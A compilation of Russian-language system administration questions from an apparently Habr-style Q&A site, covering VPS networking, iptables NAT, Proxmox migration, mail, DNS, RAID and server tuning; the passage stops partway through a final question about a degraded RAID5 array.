germn

Пытаюсь настроить VPS на clodo, делаю всё по этому мануалу, единственное, устанавливаю последние версии пакетов.


Застопорился на шаге:

lynx localhost

В консоли отдается phpinfo, всё нормально, но когда вбиваю в браузере внешний IP своего сервера, вижу «Firefox не может установить соединение с сервером».


Подскажите, пожалуйста:


— Какие действия имеет смысл произвести, чтобы найти проблему?

— В чём может быть проблема?


Честно долго Гуглил, пытался решить сам, но, к сожалению, не смог. Буду благодарен за помощь. Настраиваю VPS первый раз, равно как и первый раз общаюсь с Линуксом. Пожалуйста, не бейте сильно :)


Спасибо!

danielnewman

Стоит задача перекинуть большой диск в образ, для последующего запуска его на новом сервере. Чем (для меня) усложняется задача, помимо отсутствия опыта и критичности данных на сервере:


Исходная машина
# df -h Filesystem Size Used Avail Use% Mounted on /dev/md2 1016G 31G 934G 4% / /dev/md1 496M 56M 415M 12% /boot /dev/md3 1.7T 231G 1.4T 15% /home

* Целевая машина аналогична исходной, но с proxmox в качестве KVM-менеджера

* Приблизительный KVM-контейнером на 100-300 Gb (/home мне пока не нужен)


Как выглядит процесс миграции в моем разгулявшемся воображении:

Загрузиться на исходной машине в Rescue System режиме
Урезаю GParted'ом до 40 Gb [md2] и до 120 Mb [md1] — md3 не трогаю
Монтирую md3 в качестве хранилища образов
По совету proxmox, fsarchiver'ом делаю бэкапы md2, md1 в файлы (на md3)
Раскукоживаю диски до ~прежних размеров, и перезагружаюсь в нормальный режим
Отсылаю и восстанавливаю образы на диски/разделы целевой KVM-машины
Кручу восстановленную ОС

Где я брежу, чего не вижу и какие «ключевые слова

и выражения» должен посмотреть в гугле прежде?

esudnik

Как настроить дополнительные IP адреса в Ubuntu 10.04.3 LTS?

В настоящий момент содержание /etc/network/interfaces такое:
# Loopback device:
auto lo
iface lo inet loopback

# device: eth0
auto eth0
iface eth0 inet static
address 176.9.10.53
broadcast 176.9.10.63
netmask 255.255.255.224
gateway 176.9.10.33
post-up mii-tool -F 100baseTx-FD eth0

# default route to access subnet
up route add -net 176.9.10.32 netmask 255.255.255.224 gw 176.9.10.33 eth0

Мне нужно настроить IP адреса по этим данным:
IP: 78.46.25.192 /26
Mask: 255.255.255.192
Broadcast: 78.46.25.255
IP адреса от 78.46.25.193 до 78.46.25.254

К сожалению я здесь не могу действовать «методом тыка», так как при ошибочной конфигурации сервер может стать недоступным через SSH. Из за этого мне нужна ваша помощь.

jinxu

Существуют 2 веб сервера один в Росии другой в Китае. Как сделать так чтобы росийские пользователи при заходе на сайт по урлу, попадали на росийский сайт, а китайские на китайский?

Что-то подобное делает Google если пропинговать google.com в Китае получаем один IP, в России другой IP.

Самым логичным ришением было б что-то сделать с DNS, когда DNS сервер проверяет IP входящего и выдает ему нужный IP.


В какую сторону копать?

unreasonable

Хотелось бы узнать из первых уст нынешнюю ситуацию на рынке труда: котируются ли сертификаты уровня MCSE/RHCE и выше работодателями (хотя бы в пределах ДС/ДС-2), умеют ли HR распознавать по ним квалификацию и стоит ли вообще на что-нибудь рассчитывать?

Doomsday_nxt

Заказал для шкафа HP V142 600mm стандартные полки 750х496 — оказалось что у меня совсем нестандартный шкаф и влезет туда полка максимум 745х485 (примерно). Может кто видел подходящие к моему шкафу полки?

Спасибо!

Xxemul

Вопрос скорее к сеошникам, хотя ответ могут знать и работники хостинг-компаний? Думаете это просто глюк, накрутка или есть другие причины?

Если посмотреть статистику запросов слова бизнес хостинг в Яндексе по месяцам, то увидим следующую картину:



Ссылка на запрос в Яндекс вордстате:

wordstat.yandex.ru/?cmd=months&scmd=abs&t=%22%D0%B1%D0%B8%D0%B7%D0%BD%D0%B5%D1%81+%D1%85%D0%BE%D1%81%D1%82%D0%B8%D0%BD%D0%B3%22&geo=&text_geo=

Laughboy

Есть 6 сайтов.
5 сайтов обновляет каталог товаров с главного сайта.
Обновление: на главном формируется MySQL-дамп каталога товаров (18 таблиц, в среднем ~10тис записей на табл.) далее дамп вставляется на обновляемом сайте. В дампе — дроп таблици и инсерт записей.
Обновление одно проходит 12-15 сек.
После всех обновлений бывает зависает MySQL. Не в момент обновлений а после, может пройти 5 мин, может 10… А может и не зависнуть.

Может кто подскажет в какую сторону копать?

BlackPie

обожаю в свободное время заниматься самообразованием, и как же мне повезло, что работа и хобби почти что совпадают
одно из моих любимых занятий было и есть смотреть в таблицу левлов сисадмина, изучать что то новое и сиволично закрашивать технологии с которыми более менее разобрался, таблица хоть и шуточная, но тем не менее всё равно полезная
и в последнее время мне стало интересно, что нужно, чтобы соответствовать уровню middle?
было бы очень интересно послушать мнение опытных людей и составить более-менее четкий алгоритм действий

script88

Чем грозит chunked_transfer_encoding off в определенном location nginx, если в ответ серверу планируется отправлять большое кол-во данных и какой максимальный объем данных nginx сможет принять?

Tobishua

Имеем сейчас:
ССУЗ (с сетью на два корпуса и два общежития)
3 сервера (лаборантский, административный и студенческий) с Windows Server 2003
Ломаный UserGate 4.2 на 50 соединений, стоящий на каждом из серверов, который постоянно отваливается и глючит

Требуется
Авторизация по логину/паролю, либо по IP-адресу
Статистика по трафику
Статистика по посещённым сайтам
Блэк-листы (или возможность вручную прописывать сайты для блэк-листа)
Минимум 100 пользователей и 100 соединений на каждом сервере
Группы пользователей с возможностью выставлять ограничения по скорости
Стабильность работы (железо: Core 2 Quad (признаться, не помню какие именно), 8гб ОЗУ, 2x500гб SATA2 в RAID1)

Желательно:
Free
Веб-статистика
Простота настройки и управления

Вопросы по теме:
Существуют ли вообще бесплатные продукты, которые подходят по требованиям?
Какие можете посоветовать?
Если подходящие продукты только платные, какие можете посоветовать? (естественно, за исключением UserGate)

gigigi

Здравствуйте.
Есть windows-компьютер и есть linux-компьютер.
Есть необходимость подключить директорию из linux в качестве windows-раздела.
Пробовали подключить через SFTP Net Drive — очень медленно происходят операции с файлами.
Пробовали подключить через Samba — немного быстрее, но тоже слишком медленно.

Возможно ли подключить директорию как раздел без существенных тормозов?
Спасибо!

mastedm

Доброго времени суток


Современные приложения генерируют огромное кол-во логов. Возникает закономерный вопрос: а как анализировать такие большие объемы? grep по файлам конечно спасает в ряде задач, но все-таки хочется какого-то умного поиска с выявлением корреляций и каких-либо зависимостей.


Поделитесь своим опытом (или ссылкой на опыт других), как вы решаете эту проблему?

danielnewman

После установки proxmox в debian перемонтировал @ data

в более удобную для меня директорию /pvedata.

# cat /etc/fstab proc /proc proc defaults 0 0 none /dev/pts devpts gid=5,mode=620 0 0 /dev/md/0 /boot ext4 defaults 0 0 ## /dev/md/1 belongs to LVM volume group 'pve' /dev/pve/swap swap swap defaults 0 0 /dev/pve/root / ext4 defaults 0 0 /dev/pve/vz /var/lib/vz ext4 defaults 0 0 /dev/pve/data /pvedata ext4 default 0 0

С тех пор каждая перезагрузка вынуждала меня ручками монтировать раздел заново.

Да-да, когда публиковал вопрос и «причесывал» колоночки, коих нет в оригинальном

файле, обнаружил-таки эту громадную ошибку на внимательность и, видимо, исправил

её. Но, все же, как-то глупо получается. Где и как смотреть логи на предмет подобных

ошибок, ценой в недельный геморрой?


Это и было той загадочная ошибкой в /etc/messages?
EXT4-fs (dm-0): warning: maximal mount count reached, running e2fsck is recommended

q_styler

Всем привет!
У меня есть маленькая HTPC-коробочка.
Управляется она Windows 7 (вот планирую, что скоро будет 8)
На ней заведено два юзера.
Первый — для того, чтобы запускать XBMC.
Второй — консольный. Для µTorrent и т. п.
Редко (но бывает либо апдейт поставится, либо электричество скакнёт, либо ещё чего) компьютер перезагружается.
Тогда у меня автоматом залогинивается юзер с XBMC и автоматом запускает его на весь экран.

Итак вопрос: как сделать, чтобы второй пользователь также автоматом залогинивался в консольную сессию?

Спасибо за ответы!

danielnewman

Ситуация следующая: меняем IP хостинг.площадки на Hetzner. NS — остаются те же, меняется только A-запись.
Мгновения и nameserver Hetzner отвечает правильно, но TTL обещает, что по старому адресу будут заходить еще
TTL-часов, пока не разнесется весть по интернету и не истечет тот самый TTL.

Как мне на локальной машине (WinXP) настоять на своем «разруливании» адреса?
Нужен «карманный» DNS или есть что-то типа public hetzner dns, а может какой hosts-файл?

danielnewman

Имеется один паблик IP и сеть из виртуальных машин на Debian

# network interface settings auto lo iface lo inet loopback # device: eth0 auto eth0 iface eth0 inet static address 175.219.59.209 gateway 175.219.59.193 netmask 255.255.255.224 post-up echo 1 > /proc/sys/net/ipv4/conf/eth0/proxy_arp
А вот — моя сеть в двух вариантах настройки:
auto vmbr0 iface vmbr0 inet static address 10.10.0.1 netmask 255.255.0.0 bridge_ports none bridge_stp off bridge_fd 0 post-up ip route add 10.10.0.1/24 dev vmbr0
Тут я могу себе позволить ходить в Интернет, обновлять пакеты и прочие радости грешной жизни,
но в упор не вижу своих соседей по сети 10.10.11.0/24 (все запросы уходят в интернет)

А вот в этом варианте я могу замечательно общаться с соседними машинами 10.10.11.0/24, но никакого
интернета:
auto vmbr1 iface vmbr1 inet static address 10.10.0.1 netmask 255.255.255.0 bridge_ports none bridge_stp off bridge_fd 0 post-up echo 1 > /proc/sys/net/ipv4/ip_forward post-up iptables -t nat -A POSTROUTING -s '10.10.0.0/24' -o vmbr1 -j MASQUERADE post-down iptables -t nat -D POSTROUTING -s '10.10.0.0/24' -o vmbr1 -j MASQUERADE
Вот правило, придуманное где-то между 5 и 6 часами ночи/утра:
iptables -t nat -A POSTROUTING ! -d '10.10.11.0/24' -j SNAT --to-source '175.219.59.209'
Оно описывает мой внутренний порыв отсылать все пакеты с адресами вне сети 10.10.11.0/24 через NAT на eth0.

А как правильно это сделать?

danielnewman

То, что раньше было FTP сервером 175.149.11.09 в панеле Plesk
теперь стало сервером с адресом 10.10.11.3 с проброшенным наружу портом.

MasqueradeAddress 175.149.11.09
Может это? ProFTPd этого не понять: указать в конфигах
не разрешает политика панели (до первого рестарта)

При сохранении текущих настроек и с таким правилом:
iptables -t nat -I PREROUTING -p tcp --dport 721 -j DNAT --to-destination 10.10.11.3:21
ProFTPd материться таким затейливым образом:
proftpd[12905] 127.0.0.1: fatal: Socket operation on non-socket

heathen

Здравствуйте!

Безумно интересуют механизмы оформления документов при официальной покупке услуг за рубежом от имени российского юридического лица. В частности, официальная покупка хостинга у Hetzner. Поделитесь, пожалуйста?

Очень прошу писать только тех, кто сам сталкивался с документарным оформлением подобных сделок, буду очень благодарен за такую любезность. Поиском в Интерете пользоваться умею и я, законодательство о валютных операциях читал. Но хочется составить ясную картинку, особенно с учетом практического опыта других людей. Осложняется все тем, что, к примеру, Hetzner предлагает только публичную оферту, и в качестве оснований для платежа присутсвуют только счета на оплату. Никаких актов выполненных работ при этом нет.

Так же интересует вопрос налогообложения и учета затрат. Планируется продавать ряду других организаций услуги на основе решения, купленного за рубежом, поэтому учет затрат в бухгалтерском\налоговом учете важен.

И, безусловно, заранее спасибо за потраченное время и науку.

braindamagedman

Всем привет. Может кто-нибудь посоветовать книги, статьи по анализу производительности систем (cpu, диски, сеть...)? Желательно, чтобы там было не просто описание параметров, на которые нужно смотреть (латентности, иопсы и прочее), а рассказывалось именно про техники принятия решения — хорошо системе или плохо, про техники поиска узких мест. Чем больше практических примеров, которые можно воплотить у себя на машине и пощупать, тем лучше.

IbrahimKZ

Сервер — VDS (Debian 6.0)

Версия PHP 5.3.16-1~dotdeb.0

Проблема:

Все попытки отправить письмо из PHP скриптов, посредством smtp.gmail.com через SSL/TLS соединение заканчиваются ошибкой.


Порты не закрыты, т.к. я могу подключиться и отправить письмо посредством openssl


PHP работает с подключенным модулем openssl


Из phpinfo:

SSL Version OpenSSL/0.9.8o

и

OpenSSL support enabled

OpenSSL Library Version OpenSSL 0.9.8o 01 Jun 2010


Вот что пишет, например, phpmailer при попытке подкючиться, используя TLS


…

SMTP < — FROM SERVER:220 mx.google.com ESMTP hj19sm16658219lab.13

SMTP -> TO SERVER: EHLO mydomain.com

SMTP < — FROM SERVER: 250-mx.google.com at your service, [my IP] 250-SIZE 35882577 250-8BITMIME 250-STARTTLS 250 ENHANCEDSTATUSCODES

SMTP -> TO SERVER: STARTTLS

SMTP < — FROM SERVER:220 2.0.0 Ready to start TLS

SMTP -> TO SERVER: RSET

SMTP < — FROM SERVER:

SMTP -> ERROR: RSET failed:

SMTP -> NOTICE: EOF caught while checking if connectedThe following From address failed: test@mydomain.com Mailer Error: The following From address failed: test@mydomain.com


При попытке родкючиться, используя SSL

SMTP -> ERROR: Failed to connect to server: (o)

The following From address failed: test@mydomain.com Mailer Error: The following From address failed: test@mydomain.com

Как побороть?

danielnewman

Собственно вопрос одной строкой. Очень красивая, хорошая панель у Parallels, но вот вся эта свистопляска, с которой я столкнулся при нынешнем переезде со standalone дедика в KVM-контейнер за NAT-ом, тот уровень непрозрачности, зависимость конфигов от панели, но не наоборот (у всех свои причины).


В пользу чего вы отказались? На какую панель ушли и не жалеете ни вы, ни ваши клиенты?

LectorDr

Добрый вечер уважаемые хабрапользователи, столкнулся со следующей довольно интересной в моей практике проблемой в первый раз. Опишу по пунктно:

1. Имеется ноутбук на Windows 7 с заблокированным доменным пользователем, пароль доменного админа не знаю, доступа к серверу нет, скорее всего Windows Server 2008
2. Скинул через livecd пароли локального пользователя и админа

Вопрос, как через livecd или cmd узнать имя локального компьютера (рабочей группы)? Чтобы проверить, скинулись ли пароли и чтобы пользователь мог работать вне домен контроллера?

dbmaster

Привет,

Часто приходится логиниться через RDP на удалённые сервера через VPN.
На интранет портале настроен SSO, который работает для пользователь которые ходят прямо со своих компьютеров.

Можно ли настроить windows/ie чтобы он не спрашивал пароль внутри RDP сессии?

Заранее спасибо!

LIR

Здравствуйте.
Тут проблему сам себе создал. Как известно, у Dropbox появилась 2step-авторизация. Так вот, на свой Аккаунт ее применил. Генерировал коды с помощью Google Authenticator. В нем были коды для двух аккаунтов — Google и Dropbox. Сейчас Dropbox куда-то пропал (может, из-за перепрошивки смартфона).

Сегодня переставлял систему на ПК, пытаюсь через браузер залогиниться — запрашивает 6-значный код, а ввести я его не могу, потому что нет аккаунта в Authenticator. 16-значного пароля я вообще не припомню, т.е на руках его нету.

Неужели потерян Аккаунт? На нем 20Gb, собранных мною… Используем группой институтской как общую папку с файлами по предметам. Жалко будет.

etc

Привет всем. Есть Ubuntu Server 12.04, на нем стоит Apache. Есть несколько сайтов, которые хранятся в /var/www/{site_name}/htdocs. Есть конфиги апача в каталоге sites-available. Ну, и записи в /etc/hosts вида 127.0.1.* {site_name}.


Когда я запускаю этот сервер в Virtual Box, система разрешает имя самого сервера, т.е. я могу зайти в браузере не по IP, а по имени хоста (в данном случае ubs) и попаду на сайт default в каталоге /var/www. Но у меня так и не получилось сделать так, чтобы разрешались имена виртуальных хостов, чтобы мне на рабочей машине не приходилось для каждого хоста прописывать в /etc/hosts строку вида 192.168.1.100 ubs site1.ubs site2.ubs.


Что нужно сделать? Как заставить DNS разрешать имена виртуальных хостов, чтобы они были доступны извне? Я так понимаю, если разрешается имя самого сервера, то DNS сервер есть?

alekseymenkov

Доброго времени суток!
Я администрирую небольшое предприятие на 10 человек. В настоящий момент там происходит сущий ад с почтой. На предприятии зарегистрированно несколько почтовых ящиков — часть на mail.ru, часть на yandex.ru, часть на нормальном домене. В качестве клиентов, используется The Bat (на всех машинах). Каждый клиент настроен на всех почтовые ящики. Скачанная почта попадает в общую сетевую папку. Если один человек качает почту, она появляется у других.
И эта система работала до поры до времени, пока архивы с почтой не достигли размеров в 10-20Гб. И все стало виснуть, и все стало ломаться.
А так как я сам мало что смысл в администрировании, прошу совета — чем можно заменить подобную систему? Т.е. сбор почты со всех ящиков, синхронизация ее с клиентами. Желательно, чтобы ПО было бесплатное.

DmitryAnatolich

Обнаруживаются большие проблемы с Windows Server 2008 R2. Сразу скажу — я в деле разбираюсь не очень, а кому-то разбираться нужно. Пригласить кого-то со стороны — возможности нет (глушь).

У нас стоит «сервер» (более-менее мощный компьютер, серверным оборудованием внутри и не пахнет), на котором крутится ОС (см. выше), на которой крутится сервер терминалов, в котором пользователи работают с 1С (файловой) и еще парой программ. Так же вертится SQL Server 2005 Express. Пользователей всего — не более 30. У всех (наверное) — статически прописаны IP, шлюз и DNS-сервера провайдера. Все это лежит за ADSL-модемом D-Link 2540U, на котораом проброшены порты на наш дорогой сервер — для работы снаружи.

Итак, сначала пропали ярлыки в главном меню, затем пропали часть данных на диске — это еще ладно, восстановил. Дальше — больше. Начались проблемы с сетью: после перезагрузки (до моего прихода стоял Hyper-V — неясно зачем, решил его убрать. Теперь понял, что если что-то работает, то лучше ничего не трогать) сеть перестала видеть комп по символьному имени, по IP он нормально пинговался. Но! При попытке «пингануть» кого-то с сервер, пинг выдавал, то «Общую ошибку», то «General failure», включая пинги на 127.0.0.1. Удалил роль «Маршрутизация и удаленный доступ» — сам себя он увидел, но в остальном ничего не поменялось. Что ж, поставил на карту автоопределение сетевых параметров — пинги стали доходить и уходит, сервер появился в сети. Все бы хорошо, но IP динамический, а установить статику модем не позволял из-за кривой прошивки — просто не сохраняет значения и все тут (обновлю, как найду настройки провайдера). Вернул на статику в сетевой, какими-то манипуляциями добился от пинга «Заданная сеть недоступна». Сбрасывал Arp-ы, кешы, роуты — все так же. Вернул на динамический, обновил пользователям RDP-файлы, поменял проброс портов на модеме. Вот сегодня IP сменился — и по новой… Что делать — ума не приложу. И после перезагрузки — снова пропажа файлов, на этот раз ярлыками и инсталляторами дело не обошлось, потерлись базы 1С, стал грешить на жесткий — оказалось, что это аппаратный Raid 1. Помимо него присутствуют WDC WD20EARS-00MVWB0 и WDC WD10EALX-009BA0 — подозреваю, в raid входят подобные.
Про то, что не устанавливаются обновления — я уже молчу (unknown error code 800070005).

В процессе всего этого возникают такие ошибки:
Превышение времени ожидания (30000 мс) при ожидании ответа транзакции от службы «Netman» Превышение времени ожидания (30000 мс) при ожидании ответа транзакции от службы «UxSms». Превышение времени ожидания (30000 мс) при ожидании ответа транзакции от службы «SDevOOPNet». Компонент X.224 RDP-протокола обнаружил ошибку в потоке протокола и отключил этого клиента. WINS обнаружил ошибку базы данных. Неизвестно, насколько серьезна эта ошибка. WINS попытается устранить ее последствия. В качестве источника для поиска более детального описания ошибок базы данных можно использовать события категории «Журнал приложения» средства «Просмотр событий» компонента Exchange (ESENT). Если же подобные ошибки регулярно возникают в течение продолжительного времени (нескольких часов), то может потребоваться восстановление базы данных WINS из архивной копии. Номер ошибки содержится во втором значении типа DWORD раздела данных. Сбой при вызове ScRegSetValueExW для Start из-за ошибки
Отказано в доступе. Не удается установить обновление Windows из-за ошибки: 2149842967 "" (Командная строка: "«C:\Windows\system32\wusa.exe» «D:\Install\Venta\inst\Windows6.0-KB958483-x86.msu» ") The configuration of the AdminConnection\TCP protocol in the SQL instance SQLEXPRESS is not valid. Операция архивации, начатая в "‎2012‎-‎09‎-‎13T17:00:30.672000000Z", завершилась с ошибкой, поскольку произошел сбой службы теневого копирования при попытке создать теневые копии архивируемых томов. Код ошибки: «2155348129». Чтобы найти причину ошибки, просмотрите описание события и повторите операцию после устранения проблемы. SQLVDI: Loc=SVDS::CloseDevice. Desc=Abort detected. ErrorCode=(0). Process=1212. Thread=12016. Server. Instance=MICROSOFT##SSEE. VD=Global\{859B0FF0-477F-42B0-A123-75A9B8266D3C}1_SQLVDIMemoryName_0. Событие отклонено модулем записи VSS с ошибкой 0x800423f4, Повторяющаяся ошибка средства записи. Эта ошибка вероятно будет
возникать снова при повторении попытки архивации.
Убедительно прошу сообщество помочь, а не троллить, отправлять в гугл и т.п. — был везде, может быть, понял не все. Проблема действительно серьезная (для меня).
Заранее всем спасибо за ответы.

proshev

Здравствуйте! Вопрос простой, но тем не менее прошу помочь сориентироваться :)

В домашней локальной сети планируется установка сервера, на котором на некоторых портах будут висеть некоторые приложения (например, MySQL, Apache, SSH и т.д.). Cервер будет получать интернет с помощью Wi-Fi адаптера либо по витой паре (не выбрал еще) от роутера (на роутере firewall включен). Так вот, как настроить сервер и/или роутер так, чтобы:

1) к какому-то набору портов был доступ только из локальной сети (Apache, MySQL, WebMin)
2) к какому-то набору портов можно было достучаться извне (SSH, FTP)
3) обращения к остальным портам блокировались

Сервер на базе Ubuntu 12.04

capt_Rimmer

Приветствую.

Возможна ли организация почты, как показано на изображении? Если да, то на платформе какого почтового сервера.

Идея в том, чтобы вложения попадали на клиентский компьютер по его инициативе, а не автоматически скачивались с почтового сервера в почтовый клиент.

Т.е. когда приходит письмо со вложенным файлом из сети Интернет само вложение сохраняется отдельно в папке на сервере, а в письме добавляется ссылка на этот вложенный файл. Нужен тебе файл — проходишь по ссылке, копируешь файл, сохраняешь себе на ПК, заодно и думаешь, нужен ли тебе этот файл…

odmin4eg

День добрый, беда такая, вдруг ни с того ни с сего поломался бэкап на фтп
выполнялось монтирование фтп каталога вот так
# curlftpfs login:passwd@backup.server.ru /mnt/backup

всё было нормально с дофига времени, и вот тут случилась беда, никак не могу победить

fuse: failed to open /dev/fuse: Permission denied

Все мануалы, весь интернет переустановка всего и вся тест с правами с группами, в общем явно что-то поломалось и никак не хочет лечиться

городить велосипед из консольных фтп клиентов уж совсем не хочется, просто хочется вылить в каталог данные и забыть…
а не выдумывать различные
ncftpput –R –v –u "username" ftp.nixcraft.biz /nixcraft/forum /tmp/phpbb
или что-то такое

#!/bin/bash lftp -u username,password ftphost

kostin

Друзья, думаю, что почти любому (даже самому начинающему) администратору приходится иметь с собой (например, на флэшке) SSH-клиент под Windows для доступа на сервер под *nix.

PuTTY Portable плох тем, что не умеет хранить пароли (да, он умеет хранить ключи, но на некоторые серверы лично мне удобнее ходить именно по паролям) и требует обёртки для портабельной работы. KiTTY портабелен от рождения и пароли хранить умеет, но у меня он как-то нестабильно работает в самых разных ситуациях (теряет коннект с подозрительной периодичностью).

Чем ещё вы регулярно пользуетесь с удовольствием?

sphinks

Вопрос в следующем, создал проект локально. Стал перемещать на хостинг, кладу все папки проекта (включая web) в public_html, в итоге получаю, что сайт работает через www.my-domain.ru/web/app.php/. А хочется www.my-domain.ru. Так же можно app.php не писать, эффект будет аналогичен, при этом при переходе по ссылкам в пределах сайта уже app.php не нужно вписывать. Локально попробовал web переименовать в public_html — взлетело. Заливаю по другому весь проект, все папки за исключением web кладу рядом с public_html на хостинге, все что было в web кидаю в public_html. www.my-domain.ru/app.php/ — работает, убираю app.php — не работает, не найден индексный файл. Делаю хитрее в .htaccess вписываю строку DirectoryIndex app.php — отлично, главная страница открывается по адресу www.my-domain.ru, но все остальные ссылки не работают, все работает если руками перед ними вписывать app.php. Собственно я так понимаю symfony при правильно работе неявно подставляет app.php, но в такой расположении папок не работает. Вопрос к знатокам, как исправить? Может я зря папки положил на одном уровне с public_html, а надо было по другому как то замапить web? Разговор идет о shared хостинге, но есть ssh консоль.

sluge

Всем привет!
Я работаю с сервером ProLiant DL380 G6 на котором стоит RHEL 6.2. У этого сервера периодически наблюдается странный глюк-при наботе текста, например при вводе команд, символ печатается спустя примерно секунду после нажатия, и такая задержка немного напрягает. Продолжается это примерно минут 10, потом пропадает, потом через час где-то появляется снова. Сеть тут точно непричем, так как там пропускная сопособность 1 гигабит. Репродюсится как через ssh так и через iLO. Гораздо реже бывает другой глюк-при нажатии клавиши символ печатется 2-3 раза, то есть когда логинешься, набираешь например root, а печатается например rroot. Соответственно и пароль так набирается, то есть залогинется не получается. Бывает это как правило после перезагрузки. Толи это железо сбоит, толи линукс так глючит. Кто нибудь слышал про такие глюки?

opium

К примеру в cpanel прямо из админки можно поставить munin monitoring.
Такого же простого способа помониторить сервер с плеск я не нашел.

xmdy

Собственно, вопрос в заголовке. Перестал пинговаться и все. Сервак на всякий случай ребутнул, в техподдержку написал. Молчание, ноль реакции.

Можете проверить, у кого возможность есть?

UPDATE
Ответ хетцнера

Dear Client.

We can't help you in this case. Because this isn't our network with the routing
issue.

Что делать? Судя по комметариям ниже — надо заменить dns. Так?

UPDATE 2
пинг пошел, коннект есть, трейс так и останавливается на 3-ем.

vip_delete

Нужно сделать remote port forwarding, т.е. открыть свободный remote port с пробросом его на local port. Но при этом какой-то определенный remote port выбирать нельзя, ибо он может быть уже занят. В идеале было бы сказать ssh открыть свободный remote port, пробросить его на свободный local port, сказать мне какие порты были выбраны, чтобы я смог поднять слушающий local port и сообщить всем о поднятом remote port. Таким образом установилось бы remote port forwarding соединение с динамически выбранными портами.

philipto

Настраиваю Wordpress на своем личном хостинге, на VPS. Сам себе админ, владелец и вебмастер. На чужих хостингах видел, что администратор Wordpress может сам изменять файлы темы (заголовок, например), ставить и обновлять плагины, загружать фото. На своем хостинге такое получается сделать, только если дать пользователю, от имени которого работает apache, права записи в некоторые каталоги wordpress, в т.ч. /wp-content/themes/. Что мне, как человеку с сисадминским опытом за плечами, кажется весьма небезопасным. Разве что запускать веб-сервер исключительно для своего сайта и ни с кем его не шарить, но для хостера-то это не вариант.


Есть вариант решения этой задачи с suexec PHP, но говорят, что это замедляет работу сайта в десятки раз (минимум в 20, но есть мнение, что посещаемый сайт от такой нагрузки просто ляжет).


Других вариантов не знаю. Их действительно нет? Друзья, работающие в коммерческих хостингах говорят, что там часто полагаются на надежность CMS (в частности, Wordpress), и из-за этого сайты нередко ломают, причем чаще — через не очень качественно написанные плагины.


Все действительно так плохо?

dmitrye1

Как известно, данные в zabbix можно подгружать как с помощью периодического опроса SNMP агентов, так и с помощью обработки трапов.


В первом случае оперативность получения данных определяется периодом и есть шанс пропустить короткие события. При использовании механизма трапов с оперативностью все в порядке, но зато вероятна утрата событий, в силу специфики протокола UDP.


Хотелось бы совместить достоинства этих методов, но в zabbix типы элементов данных от SNMP агентов и от механизма трапов не совместимы в одном элементе.


Пока дошел до создание двух элементов для SNMP агентов и трапов, обьедение их данных в триггере, но… триггер громоздкий, данных много, неприглядно это.

В идеале, хотелось бы по трапу возбудить опрос zabbix-ом SNMP агента, но ничего подобного не нашел в Zabbix API.

Заранее благодарен за идеи и и подсказки!

fedor_malyshkin

Добрый день!


Есть потребность в автоматизации процесса представления прав в ряде  автоматизированных системы большому количеству пользователей.

Контекст такой: есть крупная организация (1-2 тысячи работников),  в которой используется несколько десятков программных продуктов (редко какой из них может использовать для аутентификации и представления прав Active  Directory, большинство имеют свою базу пользователей со своей системой аутентификации и авторизации),  имеем отдел поддержки пользователей, который по запросам пользователей форирует заявки на изменение прав в одной  или нескольких системах, имеем отдел безопасности, который эти заявки проверяет на допустимость и имеем отдел администрирования,  который эти заявки исполняет — заводит пользователей в системах,  выдает/меняет права. Проблема в том,  что отдел безопасности часто  запрашивает отчеты о том, кому выданы такие-то права в системе (или вообще сводный отчёт по правами в конкретной системе),  а иногда возникает необходимость в просмотре предыдущей версии заявки на конкретного пользователям и так далее.

Задача не в автоматизации выдачи прав,  а в автоматизации учета подобных «заявок» на доступ.


Даже не знаю как называется такая категория продуктов (если таковая имеется). 


Из примерных требований:

возможность работы через веб-клиент;

возможность  формирования печатной формы данной «заявки»,  где были бы отражены все выданные/планируемые к выдаче права конкретного пользователя;

система отчётности (неплохо бы с возможностью составления собственных отчетов ),  где также же отражалась бы информация по выданным на ресурс правам в соответствии с выполненными «заявками»;

версионность для «заявок»;

возможность импорта данных (пользователей, ресурсов на которые предоставляются права и так далее).


P.S.: Пишу с мобильного телефона с 'интеллектуальной'   клавиатурой и прошу прощения за возможные опечатки.

danielnewman

Хорошим тоном в профессиональной среде считается плюнуть в сторону howtoforge. Точнее в «мастеров по бесмысленному применению» чужих мыслей на счет тонкой (и толстой) настройки сервера. Вот допустим, есть тысячи кратких мануалов о том, как настроить nginx, установить proxmox и т.д. По сему стоит мой «саморучно» установленный proxmox, c sysctl «из коробки» debian, с параметрами на хостовой машине виртуализации типа такого:
net.core.netdev_max_backlog = 1000

И кучка гостевых машин с их параметрами:
net.core.netdev_max_backlog = 100500

Чую сердцем, это похоже на чувака с горлом шириной в арбуз и ртом — в мышиный сфинктор. При этом поди поищи верный net.core.netdev_max_backlog в интернет — найдешь советы выставить этот параметр в 30000. ОК, только в оригинале той тиражируемой рекомендации рассматривалась машина с аплинком в 10Gb и железяка HiEnd класса (но какое нам дело).

И немного ворчания на эту тему:


Ладно, тут вроде бы можно догадаться, но о чем я совершенно боюсь не догадаться и страстно хочу подергать — параметры вида:
kernel.* vm.* fs.* debug.* dev.* ubc.* net.* (с этого и начну) abi.* crypto.* sunrpc.*

А может в дефолтном какие параметры отсутствую начисто? Может есть какой-то дотошный гайд «для задумывающихся» с примерами из 2011/12 года?


Ман — это не совсем тот вариант, в сорцы ядра погрузиться — не хватит мозгов. Чего делать? Тупо отвалить от ядра на год-другой?


Для затравки, была всего пара статей на хабре по защите от спуфинга без всяких предупреждений, что

включенный *.rp_filter поставит вас боком, если у вас «размазанный» кластер железяк (есть деньги на кластер — купи услуги админа).


Чем чреват *.accept_source_route? Сам accept_source_route упомянут в гугле (за прошедший год) всего 3 тысячи раз. Это как бы намекает на дефицит знаний на эту тему («сиськи» обсуждали 3,4 млн раз за этот год — это в 1150 раз чаще).

danielnewman

Допустим есть пачка сервером (пока виртуальных).


HAProxy → nginx → static


Не могу понять, как замерить скорость на коммутацию пакетов, проходящих через эту группу интерфейсов/машин. Возможно в цепочке появится еще один сервер. Как замеряют такие хвосты?

LeeMiller

Два из трех серверов в дауне.

Телефон +800 сбрасываается. В тикетку на попасть
При соединении с support.selectel.ru произошла ошибка.
SSL получило запись, длина которой превышает максимально допустимую.
Тоже самое и с api.selectel.ru

Кто-нибудь в курсе что там к чему?

AlexandrDP

Есть простые решение такой задачи?

Пользователь работает на Server 2008 R2 через RDP.

Нужно получить данные, дата + время проведенное на сервере.

webhamster

Здравствуйте!

Возник тут такой вопрос. Имеется массив RAID5 на 4-х SCSI дисках. Один диск вышел из строя. RAID продолжает работать и ждет когда ему засунут новый диск.

Проблема в том, что запасных дисков нет, и поставщики не могут поставить модель диска, используемую в RAID.

В связи с чем два вопроса.

